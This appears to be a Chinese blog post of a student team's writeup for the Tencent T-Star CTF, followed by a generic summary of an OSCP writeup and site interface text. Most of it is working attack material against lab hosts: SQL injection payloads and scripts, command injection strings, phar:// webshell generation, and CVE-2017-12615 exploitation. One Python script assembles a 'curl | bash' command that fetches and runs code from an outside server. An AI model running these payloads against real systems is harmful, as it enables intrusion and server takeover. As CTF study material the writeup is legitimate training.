腾讯犀牛鸟网络安全T-Star高校挑战赛writeup

高校组 今天你吃了吗战队WRITEUP

三、 解题过程
题目一 签到
操作内容:
Js检测,禁用js即可上传
http://588f25a5.yunyansec.com/upload/2.php

蚁剑连接即可

如该题使用自己编写的脚本请详细写出,不允许截图

flag值:
key{K735c9f0D7ddc3b9}

题目二 命令执行基础
操作内容:
命令执行payload:127.0.0.1|ls …
127.0.0.1|cat …/key.php
如该题使用自己编写的脚本请详细写出,不允许截图

flag值:
flag{usderhky}

题目三 你能爆破吗
操作内容:
Admin admin 登录后,发现cookie有uname且经过base64,解密后为admin
结合描述cookie注入,对payload进行base64加密后修改cookie里的uname值 刷新页面即可。
-1" union select 1,2,flag from flag# base64后
LTEiIHVuaW9uIHNlbGVjdCAxLDIsZmxhZyBmcm9tIGZsYWcj

如该题使用自己编写的脚本请详细写出,不允许截图

flag值:
flag{a405ef895ef46d96}

题目四 文件包含getshell
操作内容:

<?php $p = new PharData(dirname(__FILE__).'/phartest2.zip', 0,'phartest2',Phar::ZIP) ; $x=file_get_contents('s.php'); $p->addFromString('2.php', $x); ?>

合成一句话木马,生成phar格式,修改后缀为txt上传,。在文件包含处,http://a3554b54.yunyansec.com/lfi.php?file=phar://./files/n6LYqzd7ZtkfUrSG.txt/2
蚁剑连接

如该题使用自己编写的脚本请详细写出,不允许截图

<?php $p = new PharData(dirname(__FILE__).'/phartest2.zip', 0,'phartest2',Phar::ZIP) ; $x=file_get_contents('s.php'); $p->addFromString('2.php', $x); ?>

flag值:
flag{weisuohenzhongyao}

题目五 成绩查询
操作内容:
Sql注入
爆表:
-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

爆字段:
-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database()#

爆flag字段::
-1’ union select 1,2,3,flag from fl4g#

如该题使用自己编写的脚本请详细写出,不允许截图

flag值:

flag{Sql_INJECT0N_4813drd8hz4}

题目六 小猫咪踩灯泡
操作内容:
CVE-2017-12615利用,put方法写马

访问写入的123.jsp

如该题使用自己编写的脚本请详细写出,不允许截图

flag值:

flag{54e47be053bf6ea1}

题目七 分析代码获得flag
操作内容:
通过linux命令换行等绕过字符限制,curl 服务器执行命令,将key写入1.txt
服务器index.html
Cat …/key

如该题使用自己编写的脚本请详细写出,不允许截图
import requests
from time import sleep
from urllib import quote

payload = [
# generate ls -t>g file
‘>ls\’,
‘ls>’,
‘>\ \’,
‘>-t\’,
‘>>g’,
'ls>>
’,

'>txt',
'>\>1.\\',
'>h\ \\',
'>bas\\',
'>\|\\',
'>248\\',
'>0.\\',
'>16\\',
'>97.\\',
'>7.\\',
'>4\\',
'>\ \\',
'>rl\\',
'>cu\\',

# exec
'sh _',
'sh g',

]

for i in payload:

r = requests.get('http://d18945d8.yunyansec.com/?1=' + quote(i))

print i

sleep(0.2)

flag值:
flag{a1c8BFF2}

题目八 SQL注入2
操作内容:
御剑扫:wwwroot.zip 内有function.php,为过滤函数,找到注入点
http://2af1b1a3.yunyansec.com/picture.php?id=1
没有过滤^,过滤了select和union就很难受,?action=login页面传递username和password值,猜测password为字段名。
1"^(password regexp ‘^{}’)%23
正则注入 password,获得password值

如该题使用自己编写的脚本请详细写出,不允许截图
import requests
from urllib.parse import quote
all="-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!#$%&()*+,-./:;<=>?@[]^_`{|}~"
flag = “”
for j in range(40):
for i in all:
url = “http://2af1b1a3.yunyansec.com/picture.php?id=1”^(password regexp ‘^{}’)%23".format(flag + i)
# url = “http://518fdfda.yunyansec.com/picture.php?id=1” ^(password regexp ‘^5’)%23"
r = requests.get(url)
print(url)
# print(r.text)
if “Picture” in r.text:
flag += i
print(flag)
break
flag值:
Flag{e0a345cadaba033073d88d2cc5dce2f7}

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值